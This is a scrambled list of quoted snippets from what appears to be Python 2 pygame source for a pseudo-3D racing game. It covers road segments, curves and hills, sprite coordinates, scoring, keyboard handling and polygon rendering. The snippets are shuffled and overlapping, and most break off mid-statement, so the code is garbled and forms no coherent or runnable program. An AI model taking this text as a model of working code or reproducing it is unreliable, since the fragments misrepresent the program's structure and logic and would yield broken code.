-self.road_w / 2 - self.player_x", "298, 'h': 190 }, 'BILLBOARD05': { 'x': 5, 'y': 897,", "!= 2: self.player_go = 0 if 2 in e_keys_up: if", "seg is looped seg_scale = self.geo_prjc_scale(self.d, zc1) x_rnd = random.randint(1,", "- self.camera_z - self.position #zc1 = self.position - (zw1 -", "'w': 232, 'h': 152 }, 'BILLBOARD03': { 'x': 5, 'y':", "= 1 elif 2 in e_keys_dn: self.player_go = 2 if", "self.track_len: self.position -= self.track_len # for check score self.last_seg_i =", "FP_ROAD_SPRTS[sprt].get('score', 0), } self.segments[j]['sprites'].append(s) def rd_sprts_del_all_objs(self): for k, sprt in", "= [] e_keys_up = [] e_keys_dn = [] for event", "0.0 self.camera_z = 500.0#1000.0#0.0 == self.camera_h self.xw = 0.0 self.yw", "0.0 self.camera_y = 0.0 self.camera_z = 500.0#1000.0#0.0 == self.camera_h self.xw", "zw1 = seg['p1']['world']['z'] zw2 = seg['p2']['world']['z'] ''' zw1 = seg['p1']['world']['z']", "sky.rect.width > 0: sky.rect.left -= sky.rect.width * 2 for hill", "seg['p2']['world']['z'] zc1 = zw1 - self.camera_z - self.position zc2 =", "- self.lane_w #xcl2 = xc2 + self.lane_w #xcl3 = xc3", "2 rad2 = rad - self.road_w / 2 yc =", "- a) * (1 - math.pow(1 - percent, 2)) def", "FPSptProgress((4, 100), c_prog=consts.GREEN) self.spd.rect.top = 70#340 self.spd.rect.left = 602 #self.spd.rotate(180)", "(d / zc) return xp def yc_to_yp(self, yc, d, zc):", "h / 2.0 - yp return ys def rd_seg_init(self, a=500):", "self.key_to_di(event.key) if di is None: di = self.key_to_di_b(event.key) if di", "class SptTmpx(sptdraw.SptDrawBase): def __init__(self, size, *args, **kwargs): super(SptTmpx, self).__init__(size) self.draw_on()", "#self.fill(consts.WHITE) self.draw_segs(self.segs, self.rad) def xy_to_cntr(self, x, y): return [self.size[0] /", "self.road.cameraDepth/self.road.playerZ #self.car.scale(self.road.cameraDepth/self.road.playerZ) self.car.scale(2) self.car.rect.top = 400 self.car.rect.left = (640 -", "elif k == self.pglc.K_BACKSPACE: self.road_reset_from_file() elif k == self.pglc.K_SLASH: self.road_segs_to_file()", "self.camera_h = 500.0#1000.0# self.speed_max = 300.0#180.0#200.0#100.0 self.lane_w = 60 self.seg_n", "+ xsl2) / 2.0, xsl1, xsl2] #x_sprt = xsr1 x_sprt", "x_i, y, scale): sprts = seg.get('sprites') if not sprts: return", "/180.0 * 0.9 #theta_i = 0.0 #xc1 = self.road_w /", "/ self.seg_draw_n engi = math.pi / 2.0 / 60#10#20 rad", "10.0 #print a s = 1.0 if a < 0.0:", "show road map self.rdmap_hide() elif k == self.pglc.K_RETURN: self.road_reset() elif", "car_w / 2) < sprt_x < (car_x + car_w /", "sprites render order self.track_len = 0.0 self.seg_len = 200.0#100.0#20.0#60.0#200.0# self.road_w", "- self.lane_w xcl2 = xc2 + self.lane_w xcl3 = xc3", "sprt_at = -1100 #print 'sprt_x', sprt_x #print 'car_x', car_x #print", "0.0) if curve == 0.0: if cv_s: tht_d = self.cv_to_engl(cv_l,", "602 #self.spd.rotate(180) self.disp_add(self.spd) def rdmap_hide(self): self.rdmap.hide() def rdmap_reset(self): self.rdmap.clear() self.rdmap.draw_segs(self.road.rd_get_segs(whole=True),", "- self.position zc2 = zw2 - self.camera_z - self.position curve_d", "{ 'x': 5, 'y': 5, 'w': 1280, 'h': 480 },", "cfg self.car = kwargs.get('car') self.bg_sky = kwargs.get('bg_sky') self.bg_hills = kwargs.get('bg_hills')", "#o = SptTmpx((40, 40)) #return o class FPSptRoadB(sptdraw.SptDrawBase): def __init__(self,", "self.util_ease_out(start_y, end_y, (float(n)+enter+hold)/total)) def add_curves(self): self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'],", "= len(self.segments) if seg_n == 0: return 0.0 else: return", "- w_half) < sprt_at < (car_x + w_half): self.score +=", "-1.0 if a < -1.0: a = -1.0 elif a", "in range(n): p = random.random() #print p rl = random.choice([1,", "n % 4 == 0: c = FP_COLORS['LIGHT'] #c =", "if x_i is None: return scr = sprt.get('score') if not", "FP_ROAD_SPRTS[sprt]['imgs'][0] obj = FPSptRdSprts.create_by_img(img) # avoid: pygame.error: Width or height", "height or ROAD['HILL']['LOW'] self.add_road(num, num, num, 0, height/2.0) self.add_road(num, num,", "else: r_events.append(event) elif event.type == self.pglc.KEYDOWN: r_events.append(event) else: r_events.append(event) return", "self.speed -= 10 if self.speed < 0.0: self.speed = 0.0", "118 }, 'BUSH2': { 'x': 255, 'y': 1097, 'w': 232,", "this road * RETURN : go to a new road", "x_i == 5: sprt_at = -1100 #print 'sprt_x', sprt_x #print", "1.0 else: return d / zc def xc_to_xp(self, xc, d,", "* i xp1 = self.xc_to_xp(xc1, self.d, zc1) xs1 = self.xp_to_xs(xp1,", "we now only use the first sprite ! sprt =", "6) # for a3c train self.rd_seg_init_rand(segnrand) # for segment draw", "= '#EEEE00' FP_COLOR_BLUE = '#00EEEE' FP_COLORS = { 'SKY': '#72D7EE',", "get_segs_pnts(self, segs, rad): pnts = [] x, y = 0.0,", "ys3 = self.yp_to_ys(yp3, self.h) ys4 = ys3 self.render_polygon(None, 0, ys1,", "self.xc_to_xp(xcl3, self.d, zc2) xsl3 = self.xp_to_xs(xpl3, self.w) xpl4 = self.xc_to_xp(xcl4,", "self.w) xpr3 = self.xc_to_xp(xcr3, self.d, zc2) xsr3 = self.xp_to_xs(xpr3, self.w)", "+= mx return result def util_ease_in(self, a, b, percent): return", "return self.check_key(events) def key_to_di(self, k): if k == self.pglc.K_UP: return", "in range(leave): self.rd_seg_add(self.util_ease_out(curve, 0, n/leave), self.util_ease_out(start_y, end_y, (float(n)+enter+hold)/total)) def add_curves(self):", "except: #print 'scale <2>', scale pass x_i_saved = info.get('x_i') #if", "event in events: #print event if event.type == self.pglc.KEYUP: k", "always move the cloud for sky in self.bg_sky: sky.rect.left -=", "seg['sprites']: spr_n = {} for sk, sv in spr.items(): if", "'HILLS': { 'x': 5, 'y': 5, 'w': 1280, 'h': 480", "0: self.score -= 1 #self.score -= 1 #if self.score <", "'y': 280, 'w': 320, 'h': 220 }, 'COLUMN': { 'x':", "in segs: curve = seg.get('curve', 0.0) if curve == 0.0:", "seg_n] # for test #self.base_seg['color'] = FP_COLORS['FINISH'] b_curve = self.player_seg.get('curve',", "/ show road map self.rdmap_hide() elif k == self.pglc.K_RETURN: self.road_reset()", "self.last_seg_i = 0 self.game_over = True self.game_score = 1.0 if", "d] #ca = 255 / n * (n - i)", "'camera': {}, 'screen': {}}, 'p2': {'world': {'z': (n + 2)", "+ str(i) + '_' + sprt obj = info.get('obj') '''", "2 - self.player_x xc4 = -self.road_w / 2 - self.player_x", "1 elif 2 in e_keys_dn: self.player_go = 2 if 1", "if sky.rect.left - sky.rect.width > 0: sky.rect.left -= sky.rect.width *", "'#555555', 'lane': '#CCCCCC'}, 'DARK': {'road': '#696969', 'grass': '#009A00', 'rumble': '#BBBBBB'", "num, 0, 0) def rd_seg_get_cleared(self, segs=None): if not segs: segs", "self.rd_seg_init(10) # for a3c train self.rd_start_seg_init() self.rd_sprts_init_rand() def draw_on(self, *args,", "ys3 #''' #if 1: #if i < self.seg_draw_n / 2:", "'+', curve, yw n = len(self.segments) #print n if n", "1.0 if self.player_di == 1: #self.player_x += self.player_x_dt self.player_x +=", "def __init__(self, size, c_bg=consts.BLUE, c_prog=consts.GREEN): super(FPSptProgress, self).__init__(size) self.c_bg = c_bg", "= random.randint(10, 40) leave = random.randint(10, 40) curve = rl", "1.0 #tht_d = math.acos(a) tht_d = math.asin(a) # TODO: tht", "= 'sr_roads/sr_road_' + str(int(time.time())) + '.txt' segs_file = utils.dir_abs(segs_file, __file__)", "< 0.0: self.speed = 0.0 elif self.speed > self.speed_max: self.speed", "= xc2 + self.lane_w #xcl3 = xc3 - self.lane_w #xcl4", "road_file: self.scn1.straight.road_reset_from_file(segs_file=road_file) def main(): #sf = GMFlatpath('flatpath <:::>', 640, 480)", "x_curve + dx_curve dx_curve = dx_curve + seg.get('curve', 0.0) xp1", "height is too large if scale > 500: #print 'scale", "60 self.seg_n = 300#200 #self.seg_draw_n = 200#150 self.seg_draw_n = 70#100#200#150", "{'road': FP_COLOR_BLACK} seg = { 'index': n, 'p1': {'world': {'z':", "self.rdpsd = pygm.SptLbl(str(int(self.road.speed)), c=consts.GREEN, font_size=12) self.rdpsd.rect.top = 456 self.rdpsd.rect.left =", "= xc * (d / zc) return xp def yc_to_yp(self,", "self.player_x - curve_d * i #xc4 = -self.road_w / 2", "keep_segs: self.init_rd_segs_rand_1() self.draw_on() self.rd_seg_render() def init_rd_segs_rand_1(self): #self.rd_seg_init(self.seg_n) #self.rd_seg_init(self.seg_draw_n) #self.rd_seg_init(100)#20#500#2#10#4#1#100#200 #self.rd_seg_init(random.randint(30,", "0.0) #b_percent = 0.5 b_percent = self.util_curve_percent_remaining(self.position, self.seg_len) dx_curve =", "'y': 894, 'w': 80, 'h': 57 }, 'CAR01': { 'x':", "n for i in range(n): rl = random.choice([1, -1]) enter", "#print 'car_x', car_x #print 'car_w', car_w #print 'sprt_at', (car_x -", "sky.rect.left + sky.rect.width < 0: sky.rect.left += sky.rect.width * 2", "0, 0) self.add_road(num, num, num, 0, height/2.0) self.add_road(num, num, num,", "try: self.pygm.draw.polygon(self.surf, c, pnts) except Exception as e: #print '-'", "'sprt_at', (car_x - car_w / 2), sprt_at, (car_x + car_w", "self.player_seg['index'] if seg_i > self.last_seg_i: self.last_seg_i = seg_i else: return", "= 0 self.game_over = True self.game_score = 1.0 if self.player_di", "600 self.disp_add(self.scr) self.tm_once = pygm.SptLbl(str(int(self.road.tm_last_once)), c=consts.YELLOW, font_size=16) self.tm_once.rect.top = 20#454", "= 0.0 elif self.speed > self.speed_max: self.speed = self.speed_max self.position", "elif k == self.pglc.K_DOWN: return 2 elif k == self.pglc.K_LEFT:", "xc2 + self.lane_w xcl3 = xc3 - self.lane_w xcl4 =", "with open(f, 'r') as fi: s = fi.read() segs =", "#print sky sky.rect.left += int(self.sky_speed * p_dt) # always move", "e_keys_up: if self.player_go != 2: self.player_go = 0 if 2", "0 if 3 in e_keys_up: if self.player_di != 1: self.player_di", "x, y): return [self.size[0] / 2 + x, self.size[1] /", "<2> if obj: self.disp_del(obj) # NOTE: objs will be deleted", "zc): if zc == 0.0: return 1.0 else: return d", "rd_seg_json_save(self, f): sc = self.rd_seg_get_cleared(self.segments) s = utils.json_dumps(sc) with open(f,", "#print a if a < -1.0: a = -1.0 elif", "if self.player_go != 2: self.player_go = 0 if 2 in", "< 0: sky.rect.left += sky.rect.width * 2 if sky.rect.left -", "0 self.disp_add(self.fog) def get_seg_base_i(self, pos=None): if pos is None: pos", "rad + self.road_w / 2 rad2 = rad - self.road_w", "self.progress(0.0) def progress(self, prog): y = self.size[1] * prog self.fill(self.c_bg)", "0, height) self.add_road(num, num, num, 0, 0) self.add_road(num, num, num,", "'w': 268, 'h': 170 }, 'DEAD_TREE2': { 'x': 1205, 'y':", "self.bg_sky1.rect.left = 0 self.disp_add(self.bg_sky1) self.bg_sky2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['SKY']) self.bg_sky2.rect.top =", "def key_to_di_b(self, k): if k == self.pglc.K_f or k ==", "488, 'y': 555, 'w': 298, 'h': 190 }, 'BILLBOARD05': {", "self.centrifugal #print p_dt #self.player_x -= p_dt self.player_x += p_dt def", "#elif p < 0.8: # curve = 0.0 # yw", "*args, **kwargs): #return events r_events = [] for event in", "value, mn, mx): return max(mn, min(value, mx)) def util_accelerate(self, v,", "self.rdmap.rect.left = 80 self.rdmap.rotate(90) self.disp_add(self.rdmap) self.rdpsd = pygm.SptLbl(str(int(self.road.speed)), c=consts.GREEN, font_size=12)", "FP_COLOR_YELLOW, 'grass': '#10AA10', 'rumble': '#555555', 'lane': '#CCCCCC'}, } FP_ROAD =", "self.score > 0: self.score -= 1 #self.score -= 1 #if", "zc) return xp def yc_to_yp(self, yc, d, zc): if zc", "self.yc = 0.0 self.zc = 0.0 ## self.xp = 0.0", "'y': 495, 'w': 1280, 'h': 480 }, 'TREES': { 'x':", "self.pygm.draw.lines(self.surf, c, False, cpnts, 3) class FPSptProgress(sptdraw.SptDrawBase): def __init__(self, size,", "+ self.lane_w xcr1 = xcr1 - x_curve xcr2 = xcr2", "* math.cos(engi * i) xx3 = rad1 * math.cos(engi *", "self.w) xp3 = self.xc_to_xp(xc3, self.d, zc2) xs3 = self.xp_to_xs(xp3, self.w)", "util_curve_percent_remaining(self, n, total): return (n % total) / total def", "in seg.items(): if k not in ['sprites']: seg_c[k] = v", "- curve_d * i #xc2 = -self.road_w / 2 -", "self.h) ys4 = ys3 ''' #if 1: #if i <", "0.3#0.15# def rd_reset(self, init=False, keep_segs=False, segs_file=None): #if not init and", "#print 'rd_seg_init_rand', n for i in range(n): p = random.random()", "yw2 = seg['p2']['world'].get('y', 0.0) yc1 = yc - yw1 yc2", "ys3, seg['color']['grass']) # road self.render_polygon(None, xs1, ys1, xs2, ys2, xs4,", "= -230 #self.disp_add(self.bk) self.scn1 = FPSceneA() self.disp_add(self.scn1) road_file = kwargs.get('road_file')", "seg_c[k] = [] for spr in seg['sprites']: spr_n = {}", "0.7: self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['EASY']) else: enter =", "rl = random.choice([1, -1]) enter = random.randint(10, 40) hold =", "# NOTE: render out here self.rd_sprt_objs[obj_k] = obj # for", "self.road.rd_get_segs(whole=True), self.road.seg_len) self.rdmap.rect.top = 0 self.rdmap.rect.left = 80 self.rdmap.rotate(90) self.disp_add(self.rdmap)", "consts.WHITE, (self.size[0] / 2, self.size[1] / 2), self.size[0] / 2,", "car_x #print 'car_w', car_w #print 'sprt_at', (car_x - car_w /", "* hill road * more road sprites * sound \"\"\"", "self.base_seg = None # the segment just under the car", "< -1000: self.player_di = 1 elif self.player_di == 1: self.player_x", "self.size[1] / 2 - y] def cv_to_engl(self, curve, rad): a", "self.get_segs_pnts(segs, rad) #print pnts if len(pnts) <= 1: return #if", "{'road': FP_COLOR_WHITE} else: c = FP_COLORS['DARK'] #c = {'road': FP_COLOR_BLACK}", "= rad #self.fill(consts.WHITE) self.draw_segs(self.segs, self.rad) def xy_to_cntr(self, x, y): return", "= -40 #p_dt = random.randint(-100, 100) #print p_dt for sky", "#if len(pnts) > 0: # pnts.append(pnts[0]) cpnts = [self.xy_to_cntr(p[0], p[1])", "seg_c = {} for k, v in seg.items(): if k", "+ ys3) / 2.0 x_dt = x_rnd * seg_scale x_pos", "check_player_di(self, e_keys_dn, e_keys_up): if 0 in e_keys_dn: self.player_go = 1", "xsr3, ys3, seg['color']['rumble']) def rd_seg_render(self): \"\"\"curve\"\"\" #theta_i = math.pi /180.0", "self.speed_dt_dn else: self.speed -= self.speed_dt_na # if on the grass,", "#tht_d = math.acos(a) tht_d = math.asin(a) return tht_d def get_segs_pnts(self,", "'p1': {'world': {'z': (n + 1) * self.seg_len, 'y': self.seg_lasy_y()},", "math.pi /180.0 * 0.9 #theta_i = 0.0 #xc1 = self.road_w", "curve == 0.0: if cv_s: tht_d = self.cv_to_engl(cv_l, rad) #tht", "FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES']) self.bg_trees1.rect.top = 0 self.bg_trees1.rect.left = 0 self.disp_add(self.bg_trees1) self.bg_trees2", "-1.0 def check_score(self): # make sure we check score once", "# for test #self.base_seg['color'] = FP_COLORS['FINISH'] b_curve = self.player_seg.get('curve', 0.0)", "self.lane_w #xcl4 = xc4 + self.lane_w xcr1 = self.lane_w -", "if self.player_di == 1: #self.player_x += self.player_x_dt self.player_x += self.speed", "10000 if x_i == 0: sprt_at = 40 elif x_i", "self.camera_h print '=' * 80 print 'self.position', self.position # <2>", "math.sin(tht) pnts.append([x, y]) #print pnts return pnts def get_segs_pnts_1(self, segs,", "= self.camera_h #print '=' * 80 #print 'self.position', self.position #", "= h / 2.0 - yp return ys def rd_seg_init(self,", "y4+a], [x1, y1+a]] # reflect the y- d = 116", "in e_keys_up: if self.player_di != 1: self.player_di = 0 def", "k, v in seg.items(): if k not in ['sprites']: seg_c[k]", "starfish import pygm from starfish import consts from starfish import", "xs = w / 2.0 + xp return xs def", "self.cfg = cfg self.car = kwargs.get('car') self.bg_sky = kwargs.get('bg_sky') self.bg_hills", "seg['color']['grass']) self.render_polygon(None, xs1, ys1, xs2, ys2, xs4, ys4, xs3, ys3,", "= zw1 - self.camera_z - self.position zc2 = zw2 -", "{ 'LENGTH': {'NONE': 0, 'SHORT': 25, 'MEDIUM': 50, 'LONG': 100", "#self.spd.rotate(180) self.disp_add(self.spd) def rdmap_hide(self): self.rdmap.hide() def rdmap_reset(self): self.rdmap.clear() self.rdmap.draw_segs(self.road.rd_get_segs(whole=True), self.road.seg_len)", "except Exception as e: print e self.init_rd_segs_rand_1() else: if not", "self.xc_to_xp(xc4, self.d, zc2) xs4 = self.xp_to_xs(xp4, self.w) yp1 = self.yc_to_yp(yc,", "render the sprites with right order for obj in self.rd_sprt_cache[::-1]:", "= SptTmpx((40, 40)) #return o class FPSptRoadB(sptdraw.SptDrawBase): def __init__(self, size,", "100), c_prog=consts.YELLOW) self.prog.rect.top = 70#340 self.prog.rect.left = 610 #self.prog.rotate(180) self.disp_add(self.prog)", "if pos is None: pos = self.position i = int(pos", "self.player_seg = self.segments[segbi] self.base_seg = self.segments[(segbi + 2) % seg_n]", "y + 240 - obj.rect.height obj.rect.left = x_pos[x_i_saved] - obj.rect.width", "= obj.rect.width car_x = self.player_x car_w = self.car.rect.width * 2", "for n in range(enter): self.rd_seg_add(self.util_ease_in(0, curve, float(n)/enter), self.util_ease_out(start_y, end_y, float(n)/total))", "x_i == 3: sprt_at = -580 elif x_i == 4:", "self.disp_add(self.spd) def rdmap_hide(self): self.rdmap.hide() def rdmap_reset(self): self.rdmap.clear() self.rdmap.draw_segs(self.road.rd_get_segs(whole=True), self.road.seg_len) self.rdmap.rotate(90)", "* random.random() * 6.0 yw = 0.0 self.add_road(enter, hold, leave,", "rd_seg_init_rand_curve(self, n=5): #print 'rd_seg_init_rand', n for i in range(n): rl", "return events else: return self.check_key(events) def key_to_di(self, k): if k", "d-y3], [x4, d-y4], [x1, d-y1]] c = utils.clr_from_str(color) try: self.pygm.draw.polygon(self.surf,", "# hide / show road map self.rdmap_hide() elif k ==", "at rd_sprts_del_all_objs() ##del self.rd_sprt_objs[obj_k] img = FP_ROAD_SPRTS[sprt]['imgs'][0] obj = FPSptRdSprts.create_by_img(img)", "= 456 self.rdpsd.rect.left = 312 self.disp_add(self.rdpsd) self.scr = pygm.SptLbl(str(int(self.road.score)), c=consts.RED,", "ys1 = self.yp_to_ys(yp1, self.h) ys2 = ys1 yp3 = self.yc_to_yp(yc,", "-100,}, } class SptTmpx(sptdraw.SptDrawBase): def __init__(self, size, *args, **kwargs): super(SptTmpx,", "2 == 1: xpl1 = self.xc_to_xp(xcl1, self.d, zc1) xsl1 =", "dx_curve + seg.get('curve', 0.0) # for hills yw1 = seg['p1']['world'].get('y',", "'HILL': {'NONE': 0, 'LOW': 20, 'MEDIUM': 40, 'HIGH': 60 },", "140 }, 'TREE2': { 'x': 1205, 'y': 5, 'w': 282,", "self).__init__(size) self.cfg = cfg self.car = kwargs.get('car') self.bg_sky = kwargs.get('bg_sky')", "return obj def handle_event(self, events, *args, **kwargs): #print '>>> ',", "* math.pow(percent, 2) def util_ease_out(self, a, b, percent): return a", "FP_COLORS['START_Y'] #self.segments[2]['color'] = FP_COLORS['START_Y'] for i in range(n): self.segments[i]['color'] =", "map * TAB : replay this road * RETURN :", "/ self.seg_len)) #i = int(math.ceil(pos / self.seg_len)) seg_n = len(self.segments)", "* random.random() * 8.0 yw = 0.0 self.add_road(enter, hold, leave,", "return 3 else: return None def check_key(self, events): #print id(events)", "hide/show road map * TAB : replay this road *", "return scr = sprt.get('score') if not scr: # None or", "= (i+2)*self.seg_len zc1 = zw1 - self.camera_z - (self.position %", "! sprt = sprts[0] x_i = sprt.get('x_i') if x_i is", "__init__(self, img_file, *args, **kwargs): super(SptTmpi, self).__init__(img_file) class FPSptBg(pygm.SptImgOne): def __init__(self,", "'PLAYER_LEFT': { 'x': 995, 'y': 480, 'w': 80, 'h': 41", "+ seg_n) % seg_n return i def rd_get_segs(self, whole=False): if", "in e_keys_dn: self.player_di = 1 elif 3 in e_keys_dn: self.player_di", "1018, 'w': 80, 'h': 45 }, 'PLAYER_LEFT': { 'x': 995,", "/ 2, 0) class SptTmpi(pygm.SptImg): def __init__(self, img_file, *args, **kwargs):", "* math.cos(engi * i) xx2 = rad2 * math.cos(engi *", "= math.acos(a) tht_d = math.asin(a) return tht_d def get_segs_pnts(self, segs,", "self.add_road(num, num, num, 0, 0) def rd_seg_get_cleared(self, segs=None): if not", "n, 'p1': {'world': {'z': (n + 1) * self.seg_len, 'y':", "# get real (random) x from x_pos 'x_i': random.randint(0, 4),", "'pot2': {'imgs': ['img_sprts/i_pot2.png'], 'score': -1,}, 'shell': {'imgs': ['img_sprts/p_shell.png'], 'score': -20,},", "'rd_seg_init_rand', n for i in range(n): p = random.random() #print", "zc2 = zw2 - self.camera_z - self.position ''' # for", "as fo: fo.write(s) def rd_seg_json_load(self, f): with open(f, 'r') as", "sprt in self.rd_sprt_objs.items(): #print k, sprt self.disp_del(sprt) del self.rd_sprt_objs[k] def", "} self.segments.append(seg) self.track_len = len(self.segments) * self.seg_len #self.track_len = (len(self.segments)", "n * (n - i) self.c[3] = ca self.pygm.draw.rect(self.surf, self.c,", "is not None: e_keys_dn.append(di) else: r_events.append(event) else: r_events.append(event) self.e_keys_up =", "r_events.append(event) elif event.type == self.pglc.KEYDOWN: di = self.key_to_di(event.key) if di", "c_bg=consts.BLUE, c_prog=consts.GREEN): super(FPSptProgress, self).__init__(size) self.c_bg = c_bg self.c_prog = c_prog", "{ 'x': 5, 'y': 1097, 'w': 240, 'h': 155 },", "if seg_n == 0: return #self.segments[0]['color'] = FP_COLORS['START_Y'] #self.segments[2]['color'] =", "= 0 self.bg_trees1.rect.left = 0 self.disp_add(self.bg_trees1) self.bg_trees2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES'])", "zc1) xsl1 = self.xp_to_xs(xpl1, self.w) xpl2 = self.xc_to_xp(xcl2, self.d, zc1)", "2: self.player_go = 0 if 2 in e_keys_up: if self.player_go", "= (i+1)*self.seg_len zw2 = (i+2)*self.seg_len zc1 = zw1 - self.camera_z", "sprt, 'type': 1, # image / animate / ... 'obj':", "else: # <1> zw1 = seg['p1']['world']['z'] zw2 = seg['p2']['world']['z'] '''", "def rd_seg_init_rand_curve(self, n=5): #print 'rd_seg_init_rand', n for i in range(n):", "if k == self.pglc.K_UP: return 0 elif k == self.pglc.K_RIGHT:", "} IMG_POS_SPRITES = { 'PALM_TREE': { 'x': 5, 'y': 5,", "0.0) def add_low_rolling_hills(self, num, height): num = num or ROAD['LENGTH']['SHORT']", "313, 'y': 897, 'w': 298, 'h': 190 }, 'BOULDER2': {", "di is not None: e_keys_up.append(di) else: r_events.append(event) elif event.type ==", "random.choice(FP_ROAD_SPRTS.keys()) s = { 'name': sprt, 'type': 1, # image", "'index': n, 'p1': {'world': {'z': (n + 1) * self.seg_len,", "= 200 / n * (n - i) self.c[3] =", "self).__init__(img_file, pos) class FPSptSprts(pygm.SptImgOne): def __init__(self, img_file, pos, *args, **kwargs):", "116 pnts = [[x1, d-y1], [x2, d-y2], [x3, d-y3], [x4,", "- xx3) - self.player_x xc4 = (rad - xx4) -", "range(leave): self.rd_seg_add(self.util_ease_out(curve, 0, n/leave), self.util_ease_out(start_y, end_y, (float(n)+enter+hold)/total)) def add_curves(self): self.add_road(FP_ROAD['LENGTH']['MEDIUM'],", "+ 0.5) def util_curve_percent_remaining(self, n, total): return (n % total)", "TODO: do at update #dpx1 = self.seg_len * math.tan(theta_i) #self.player_x", "down if self.player_x < -self.road_w / 2 or \\ self.player_x", "= self.road_w / 2 - self.player_x xc2 = -self.road_w /", "* prog self.fill(self.c_bg) #self.pygm.draw.rect(self.surf, consts.GREEN, # [1, 0, self.size[0] -", "self.speed = 0.0 elif self.speed > self.speed_max: self.speed = self.speed_max", "self.road.rect.top = 240 self.road.rect.left = 0 self.disp_add(self.road) self.disp_add(self.car) self.rdmap =", "k = event.key if k == self.pglc.K_SPACE: # hide /", "*args, **kwargs): super(GMFlatpath, self).__init__(title, winw, winh) bk_im = utils.dir_abs('starfish/data/img_bk_1.jpg', __file__)", "refresh(self, fps_clock, *args, **kwargs): self.check_player_di(self.e_keys_dn, self.e_keys_up) self.draw_on() self.rd_seg_render() self.update_world() self.check_if_car_out_road()", "ys1 scale_sprt = seg_scale * 8.0#10.0#2.0 obj = self.rd_sprts_render(seg, x_pos,", "= pygm.SptImg('data/img_bk_1.jpg') self.bk = pygm.SptImg(bk_im) self.bk.rect.top = -230 self.bk.rect.left =", "#xc2 = -self.road_w / 2 - self.player_x #xc3 = self.road_w", "= FP_COLORS['START_Y'] #self.segments[2]['color'] = FP_COLORS['START_Y'] for i in range(n): self.segments[i]['color']", "curve_d = 500 #x#xc1 = self.road_w / 2 - self.player_x", "# render the sprites with right order for obj in", "xpr2 = self.xc_to_xp(xcr2, self.d, zc1) xsr2 = self.xp_to_xs(xpr2, self.w) xpr3", "2), sprt_at, (car_x + car_w / 2) #print '-' *", "1100 elif x_i == 5: sprt_at = -1100 #print 'sprt_x',", "self.w) xpl3 = self.xc_to_xp(xcl3, self.d, zc2) xsl3 = self.xp_to_xs(xpl3, self.w)", "self.segments[si] #''' ''' #x# if seg['index'] < segbi: zw1 =", "return None def key_to_di_b(self, k): if k == self.pglc.K_f or", "deleted at rd_sprts_del_all_objs() ##del self.rd_sprt_objs[obj_k] img = FP_ROAD_SPRTS[sprt]['imgs'][0] obj =", "0.0 self.position = 0.0 self.player_x = 0.0#100.0#1000.0# self.centrifugal = 0.1#0.06#0.08#0.01#0.3", "add_fog(self): self.fog = FPSptFog(self.size) self.fog.rect.top = 240 self.fog.rect.left = 0", "check_tm(self): if self.position > self.seg_len * 2: if self.tm_start ==", "= math.pi /180.0 * 0.9 #theta_i = 0.0 #xc1 =", "<= 0.0: return p_curve = self.player_seg.get('curve', 0.0) #p_curve = 3", "70#100#200#150 self.speed = 0.0 self.position = 0.0 self.player_x = 0.0#100.0#1000.0#", "y1, x2, y2, x3, y3, x4, y4, color): #d =", "'LOW': 20, 'MEDIUM': 40, 'HIGH': 60 }, } FP_ROAD_SPRTS =", "random.randint(10, 40) if p < 0.3: curve = 0.0 yw", "s = 1.0 if a < 0.0: s = -1.0", "'x': 995, 'y': 480, 'w': 80, 'h': 41 }, 'PLAYER_STRAIGHT':", "self.track_len = len(self.segments) * self.seg_len #self.track_len = (len(self.segments) - self.seg_draw_n)", "def progress(self, prog): y = self.size[1] * prog self.fill(self.c_bg) #self.pygm.draw.rect(self.surf,", "math.asin(a) return tht_d def get_segs_pnts(self, segs, rad): pnts = []", "xc * (d / zc) return xp def yc_to_yp(self, yc,", "1385, 'y': 1018, 'w': 80, 'h': 45 }, 'PLAYER_LEFT': {", "util_ease_out(self, a, b, percent): return a + (b - a)", "500.0#1000.0#0.0 == self.camera_h self.xw = 0.0 self.yw = 0.0 self.zw", "['img_sprts/bear2.png'], 'score': -80,}, #'dinof': {'imgs': ['img_sprts/dinof2.png'], 'score': -50,}, 'blobb': {'imgs':", "segs_file=segs_file) self.rdmap_reset() def road_segs_to_file(self, segs_file=None): if not segs_file: segs_file =", "False, cpnts, 3) class FPSptProgress(sptdraw.SptDrawBase): def __init__(self, size, c_bg=consts.BLUE, c_prog=consts.GREEN):", "== self.pglc.KEYDOWN: r_events.append(event) else: r_events.append(event) return r_events def refresh(self, fps_clock,", "di = self.key_to_di(event.key) if di is None: di = self.key_to_di_b(event.key)", "return 0.0 else: return self.segments[seg_n - 1]['p2']['world'].get('y', 0.0) def rd_seg_init_rand(self,", "- dx_curve xc4 = xc4 - x_curve - dx_curve xcl1", "(result >= mx): result -= mx while (result < 0):", "0 return #rd_w_half = self.road_w / 2 #x_pos = [rd_w_half", "self.bg_sky: #print sky sky.rect.left += int(self.sky_speed * p_dt) # always", "self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['MEDIUM']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],", "< 0.8: # curve = 0.0 # yw = random.random()", "n = seg_n / random.randint(10, 30) for i in range(n):", "hill road * more road sprites * sound \"\"\" import", "self.spd.progress(spdc) class FPSceneA(pygm.PyGMScene): def __init__(self, *args, **kwargs): super(FPSceneA, self).__init__(*args, **kwargs)", "100) #print p_dt for sky in self.bg_sky: #print sky sky.rect.left", "if a < -1.0: a = -1.0 elif a >", "-20,}, 'rockd': {'imgs': ['img_sprts/rock_d2.png'], 'score': -10,}, 'rockr': {'imgs': ['img_sprts/rock_r2.png'], 'score':", "not obj: # None or 0 return #rd_w_half = self.road_w", "'DEAD_TREE1': { 'x': 